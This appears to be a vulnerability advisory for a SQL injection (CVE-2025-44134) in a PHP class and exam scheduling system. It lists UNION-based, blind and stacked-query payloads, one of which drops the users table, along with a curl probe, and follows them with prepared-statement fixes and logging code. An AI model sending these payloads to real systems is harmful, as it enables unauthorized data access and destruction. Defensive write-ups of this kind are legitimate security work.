Code-Projects Online Class and Exam Scheduling System 10, SQL Injection, CVE-2025-44134 (Critical)

How CVE-2025-44134 Works

The vulnerability exists in `/Scheduling/pages/class_save.php` where the `class` parameter is directly concatenated into an SQL query without proper sanitization. Attackers can inject malicious SQL payloads through this parameter to manipulate database queries. This allows unauthorized access to sensitive data, including student records, exam details, and administrative credentials. The lack of prepared statements or input validation enables classic SQLi techniques like UNION-based or blind injection.

DailyCVE Form

Platform: Code-Projects Scheduling System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/14/2025

What Undercode Say:

Exploitation

1. Union-Based Injection:

class=1' UNION SELECT 1,2,3,4,group_concat(table_name) FROM information_schema.tables-- -

2. Blind SQLi Detection:

class=1' AND (SELECT 1 FROM dual WHERE database() LIKE 'a%')-- -

3. Stacked Query (this payload deletes data rather than exfiltrating it):

class=1' OR 1=1; DROP TABLE users;-- -

Protection

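1. Input Validation (escaping):

// Escapes quote characters for use inside a quoted SQL string literal; prefer the prepared statement in step 2.
$class = mysqli_real_escape_string($conn, $_POST['class']);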

2. Prepared Statements:

// Bind the value as a parameter so it is never parsed as SQL.
$stmt = $conn->prepare("INSERT INTO classes (name) VALUES (?)");
$stmt->bind_param("s", $_POST['class']);
$stmt->execute();

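3. WAF Rules (nginx access rule):

# Deny PHP requests under the affected directory only; a bare \.php$ match would block the whole application.
location ~ ^/Scheduling/pages/.*\.php$ {
    deny all;
}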

Analytics

  • CVSS 4.0: 9.8 (AV:N/AC:L/AT:N/PR:N/UI:N/S:C/C:H/I:H/A:H)
  • Exploitability: Remote, No Auth
  • Impact: Full DB Compromise

Detection

grep -r "class_save.php" /var/www/html
curl -X POST "http://target/Scheduling/pages/class_save.php" -d "class=1'"

Mitigation

1. Patch: Upgrade to v2.0+

2. Disable `/Scheduling/pages/` if unused.

3. Log suspicious queries:

-- Bind the client address from the application (PHP: $_SERVER['REMOTE_ADDR']).
INSERT INTO audit_log VALUES (NOW(), 'SQLi Attempt', ?);
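
The Protection steps and the audit-log step above combined into one handler, as an added example that is not the project's own code: allow-list validation, a bound parameter, and an audit-log entry for rejected input. The `classes` and `audit_log` schemas, the accepted name format, the function names, and the use of PDO with in-memory SQLite (so it runs without a MySQL server) are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical schema: the real application's tables are not shown on the page.
function open_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE classes (name TEXT NOT NULL)');
    $db->exec('CREATE TABLE audit_log (at TEXT, event TEXT, remote_addr TEXT)');
    return $db;
}

// Allow-list validation: letters, digits, space, dash; 1-32 chars (assumed format).
function is_valid_class(string $class): bool {
    return preg_match('/\A[A-Za-z0-9 \-]{1,32}\z/', $class) === 1;
}

// Returns true when the row was stored, false when the input was rejected and logged.
function save_class(PDO $db, string $class, string $remoteAddr): bool {
    if (!is_valid_class($class)) {
        // The log entry itself uses bound parameters as well.
        $log = $db->prepare('INSERT INTO audit_log VALUES (CURRENT_TIMESTAMP, ?, ?)');
        $log->execute(['SQLi Attempt', $remoteAddr]);
        return false;
    }
    // The value is bound, never concatenated, so quotes cannot change the query.
    $stmt = $db->prepare('INSERT INTO classes (name) VALUES (?)');
    $stmt->execute([$class]);
    return true;
}

// Constructed inputs: one normal class name, one carrying a quote and SQL keywords.
$db = open_demo_db();
$samples = ['BSIT 3A', "1' OR '1'='1"];
foreach ($samples as $input) {
    $stored = save_class($db, $input, '203.0.113.7'); // documentation-range address
    printf("%-16s => %s\n", $input, $stored ? 'stored' : 'rejected and logged');
}
printf("classes rows: %d, audit rows: %d\n",
    $db->query('SELECT COUNT(*) FROM classes')->fetchColumn(),
    $db->query('SELECT COUNT(*) FROM audit_log')->fetchColumn());
```

With mysqli the same structure applies: replace the PDO calls with `prepare`, `bind_param` and `execute` as in step 2 of Protection.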

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
